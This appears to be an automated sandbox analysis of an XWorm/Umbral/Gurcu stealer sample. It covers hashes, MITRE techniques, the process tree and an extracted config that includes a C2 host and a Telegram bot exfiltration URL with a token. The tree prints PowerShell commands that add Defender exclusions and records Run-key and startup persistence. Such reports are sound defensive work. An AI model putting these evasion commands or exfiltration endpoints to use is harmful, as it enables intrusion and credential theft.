gurcu | fc374086d2937728fb9bfd1e84f4e17fe443af03f5354904d394033459f5d3ad

Analysis

max time kernel
713s
max time network
714s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250218-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250218-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
11/03/2025, 11:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ратка.exe
Size

67KB
MD5

90c1fd3249cbb92929d26ac792b1cc29
SHA1

16514ba032ca6268bdb670c6f3d9a133c8879c99
SHA256

fc374086d2937728fb9bfd1e84f4e17fe443af03f5354904d394033459f5d3ad
SHA512

8a41f65e141a77c3235a2c0cec1e02e99ea67e6c58e4d283008d7884422f253cefc97fd8f0dd2a4aac4be08357ee05d891043b328037754edf4f1dc4a6d70aac
SSDEEP

1536:r9DZVIk78bb/+7A+55U1RO+bQ08SzP/6x+BgbOPQQWrZ9:BDLIk7ubKRWQ+bQAK+BgbOPQNX

Score

10^/10

gurcu umbral xworm discovery execution persistence pyinstaller rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

means-meta.gl.at.ply.gg:52604

Attributes

Install_directory
%Userprofile%
install_file
svchost.exe
telegram
https://api.telegram.org/bot7389617975:AAFNBkW6gfsAxHeXuCSCpKK2LqIKysVo-aw/sendMessage?chat_id=6968388729

Extracted

Family

gurcu

https://api.telegram.org/bot7389617975:AAFNBkW6gfsAxHeXuCSCpKK2LqIKysVo-aw/sendMessage?chat_id=6968388729

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a000000028349-1584.dat	family_umbral
behavioral1/memory/6020-1592-0x00000279DD190000-0x00000279DD1D0000-memory.dmp	family_umbral

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1600-1-0x0000000000130000-0x0000000000148000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1044	powershell.exe
2836	powershell.exe
3400	powershell.exe
3436	powershell.exe
1684	powershell.exe
540	powershell.exe
5176	powershell.exe
2136	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Control Panel\International\Geo\Nation	Ратка.exe
Key value queried	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Control Panel\International\Geo\Nation	yywmjx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Ратка.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Ратка.exe

Executes dropped EXE 8 IoCs

pid	Process
916	hamgjk.exe
2156	wrbilj.exe
1892	djkkgn.exe
4940	spipwq.exe
1852	spipwq.exe
5588	yywmjx.exe
5452	figvgj.exe
6020	urithl.exe

Loads dropped DLL 5 IoCs

pid	Process
1852	spipwq.exe
1852	spipwq.exe
1852	spipwq.exe
1852	spipwq.exe
1852	spipwq.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\svchost.exe"	Ратка.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	djkkgn.exe
File opened (read-only)	\??\M:	djkkgn.exe
File opened (read-only)	\??\N:	djkkgn.exe
File opened (read-only)	\??\P:	djkkgn.exe
File opened (read-only)	\??\R:	djkkgn.exe
File opened (read-only)	\??\V:	djkkgn.exe
File opened (read-only)	\??\X:	djkkgn.exe
File opened (read-only)	\??\Z:	djkkgn.exe
File opened (read-only)	\??\L:	djkkgn.exe
File opened (read-only)	\??\O:	djkkgn.exe
File opened (read-only)	\??\U:	djkkgn.exe
File opened (read-only)	\??\G:	djkkgn.exe
File opened (read-only)	\??\H:	djkkgn.exe
File opened (read-only)	\??\I:	djkkgn.exe
File opened (read-only)	\??\Q:	djkkgn.exe
File opened (read-only)	\??\Y:	djkkgn.exe
File opened (read-only)	\??\A:	djkkgn.exe
File opened (read-only)	\??\B:	djkkgn.exe
File opened (read-only)	\??\D:	djkkgn.exe
File opened (read-only)	\??\K:	djkkgn.exe
File opened (read-only)	\??\S:	djkkgn.exe
File opened (read-only)	\??\T:	djkkgn.exe
File opened (read-only)	\??\W:	djkkgn.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
146	discord.com
147	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
144	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000027f44-147.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3784	916	WerFault.exe	99

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yywmjx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RUNDLL32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hamgjk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wrbilj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spipwq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spipwq.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4880	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-556327730-4249790997-552795783-1000\{1E620F73-8AD5-47B9-8048-A23A9309DAA4}	djkkgn.exe
Key created	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings	yywmjx.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1044	powershell.exe
1044	powershell.exe
2836	powershell.exe
2836	powershell.exe
3400	powershell.exe
3400	powershell.exe
3436	powershell.exe
3436	powershell.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1600	Ратка.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
3984	msedge.exe
3984	msedge.exe
3584	msedge.exe
3584	msedge.exe
1720	identity_helper.exe
1720	identity_helper.exe
624	msedge.exe
624	msedge.exe
624	msedge.exe
624	msedge.exe
1684	powershell.exe
1684	powershell.exe
1684	powershell.exe
2136	powershell.exe
2136	powershell.exe
2136	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
4276	powershell.exe
4276	powershell.exe
4276	powershell.exe
5668	wmic.exe
5668	wmic.exe
5668	wmic.exe
5668	wmic.exe
2868	wmic.exe
2868	wmic.exe
2868	wmic.exe
2868	wmic.exe
5740	wmic.exe
5740	wmic.exe
5740	wmic.exe
5740	wmic.exe
5176	powershell.exe
5176	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1600	Ратка.exe
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeIncreaseQuotaPrivilege	1044	powershell.exe
Token: SeSecurityPrivilege	1044	powershell.exe
Token: SeTakeOwnershipPrivilege	1044	powershell.exe
Token: SeLoadDriverPrivilege	1044	powershell.exe
Token: SeSystemProfilePrivilege	1044	powershell.exe
Token: SeSystemtimePrivilege	1044	powershell.exe
Token: SeProfSingleProcessPrivilege	1044	powershell.exe
Token: SeIncBasePriorityPrivilege	1044	powershell.exe
Token: SeCreatePagefilePrivilege	1044	powershell.exe
Token: SeBackupPrivilege	1044	powershell.exe
Token: SeRestorePrivilege	1044	powershell.exe
Token: SeShutdownPrivilege	1044	powershell.exe
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeSystemEnvironmentPrivilege	1044	powershell.exe
Token: SeRemoteShutdownPrivilege	1044	powershell.exe
Token: SeUndockPrivilege	1044	powershell.exe
Token: SeManageVolumePrivilege	1044	powershell.exe
Token: 33	1044	powershell.exe
Token: 34	1044	powershell.exe
Token: 35	1044	powershell.exe
Token: 36	1044	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeIncreaseQuotaPrivilege	2836	powershell.exe
Token: SeSecurityPrivilege	2836	powershell.exe
Token: SeTakeOwnershipPrivilege	2836	powershell.exe
Token: SeLoadDriverPrivilege	2836	powershell.exe
Token: SeSystemProfilePrivilege	2836	powershell.exe
Token: SeSystemtimePrivilege	2836	powershell.exe
Token: SeProfSingleProcessPrivilege	2836	powershell.exe
Token: SeIncBasePriorityPrivilege	2836	powershell.exe
Token: SeCreatePagefilePrivilege	2836	powershell.exe
Token: SeBackupPrivilege	2836	powershell.exe
Token: SeRestorePrivilege	2836	powershell.exe
Token: SeShutdownPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeSystemEnvironmentPrivilege	2836	powershell.exe
Token: SeRemoteShutdownPrivilege	2836	powershell.exe
Token: SeUndockPrivilege	2836	powershell.exe
Token: SeManageVolumePrivilege	2836	powershell.exe
Token: 33	2836	powershell.exe
Token: 34	2836	powershell.exe
Token: 35	2836	powershell.exe
Token: 36	2836	powershell.exe
Token: SeDebugPrivilege	3400	powershell.exe
Token: SeIncreaseQuotaPrivilege	3400	powershell.exe
Token: SeSecurityPrivilege	3400	powershell.exe
Token: SeTakeOwnershipPrivilege	3400	powershell.exe
Token: SeLoadDriverPrivilege	3400	powershell.exe
Token: SeSystemProfilePrivilege	3400	powershell.exe
Token: SeSystemtimePrivilege	3400	powershell.exe
Token: SeProfSingleProcessPrivilege	3400	powershell.exe
Token: SeIncBasePriorityPrivilege	3400	powershell.exe
Token: SeCreatePagefilePrivilege	3400	powershell.exe
Token: SeBackupPrivilege	3400	powershell.exe
Token: SeRestorePrivilege	3400	powershell.exe
Token: SeShutdownPrivilege	3400	powershell.exe
Token: SeDebugPrivilege	3400	powershell.exe
Token: SeSystemEnvironmentPrivilege	3400	powershell.exe
Token: SeRemoteShutdownPrivilege	3400	powershell.exe
Token: SeUndockPrivilege	3400	powershell.exe
Token: SeManageVolumePrivilege	3400	powershell.exe
Token: 33	3400	powershell.exe

Suspicious use of FindShellTrayWindow 55 IoCs

pid	Process
1892	djkkgn.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe

Suspicious use of SendNotifyMessage 53 IoCs

pid	Process
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
1284	taskmgr.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1600	Ратка.exe
2156	wrbilj.exe
1852	spipwq.exe
1852	spipwq.exe
1852	spipwq.exe
1852	spipwq.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1600 wrote to memory of 1044	1600	Ратка.exe	85
PID 1600 wrote to memory of 1044	1600	Ратка.exe	85
PID 1600 wrote to memory of 2836	1600	Ратка.exe	89
PID 1600 wrote to memory of 2836	1600	Ратка.exe	89
PID 1600 wrote to memory of 3400	1600	Ратка.exe	91
PID 1600 wrote to memory of 3400	1600	Ратка.exe	91
PID 1600 wrote to memory of 3436	1600	Ратка.exe	94
PID 1600 wrote to memory of 3436	1600	Ратка.exe	94
PID 1600 wrote to memory of 916	1600	Ратка.exe	99
PID 1600 wrote to memory of 916	1600	Ратка.exe	99
PID 1600 wrote to memory of 916	1600	Ратка.exe	99
PID 1600 wrote to memory of 2156	1600	Ратка.exe	109
PID 1600 wrote to memory of 2156	1600	Ратка.exe	109
PID 1600 wrote to memory of 2156	1600	Ратка.exe	109
PID 1600 wrote to memory of 1892	1600	Ратка.exe	110
PID 1600 wrote to memory of 1892	1600	Ратка.exe	110
PID 1600 wrote to memory of 4940	1600	Ратка.exe	115
PID 1600 wrote to memory of 4940	1600	Ратка.exe	115
PID 1600 wrote to memory of 4940	1600	Ратка.exe	115
PID 4940 wrote to memory of 1852	4940	spipwq.exe	116
PID 4940 wrote to memory of 1852	4940	spipwq.exe	116
PID 4940 wrote to memory of 1852	4940	spipwq.exe	116
PID 1600 wrote to memory of 1516	1600	Ратка.exe	119
PID 1600 wrote to memory of 1516	1600	Ратка.exe	119
PID 1516 wrote to memory of 3584	1516	cmd.exe	121
PID 1516 wrote to memory of 3584	1516	cmd.exe	121
PID 3584 wrote to memory of 1388	3584	msedge.exe	123
PID 3584 wrote to memory of 1388	3584	msedge.exe	123
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124
PID 3584 wrote to memory of 3408	3584	msedge.exe	124

C:\Users\Admin\AppData\Local\Temp\Ратка.exe
"C:\Users\Admin\AppData\Local\Temp\Ратка.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Ратка.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ратка.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\svchost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3436
- C:\Users\Admin\AppData\Local\Temp\hamgjk.exe
  "C:\Users\Admin\AppData\Local\Temp\hamgjk.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:916
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 1196
    3⤵
    - Program crash
    PID:3784
- C:\Users\Admin\AppData\Local\Temp\wrbilj.exe
  "C:\Users\Admin\AppData\Local\Temp\wrbilj.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2156
- C:\Users\Admin\AppData\Local\Temp\djkkgn.exe
  "C:\Users\Admin\AppData\Local\Temp\djkkgn.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  PID:1892
- C:\Users\Admin\AppData\Local\Temp\spipwq.exe
  "C:\Users\Admin\AppData\Local\Temp\spipwq.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4940
- - C:\Users\Admin\AppData\Local\Temp\spipwq.exe
    "C:\Users\Admin\AppData\Local\Temp\spipwq.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cphdbi.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1516
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://youtu.be/lFwy2c-5Rwg
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3584
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x10c,0x150,0x7ffc9ddc46f8,0x7ffc9ddc4708,0x7ffc9ddc4718
      4⤵
      PID:1388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
      4⤵
      PID:3408
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3024 /prefetch:8
      4⤵
      PID:2676
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
      4⤵
      PID:1168
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
      4⤵
      PID:3784
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
      4⤵
      PID:1352
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
      4⤵
      PID:1712
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5456 /prefetch:8
      4⤵
      PID:5064
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6072 /prefetch:8
      4⤵
      PID:4512
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,10179003479444976772,17396345482809401278,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6072 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1720
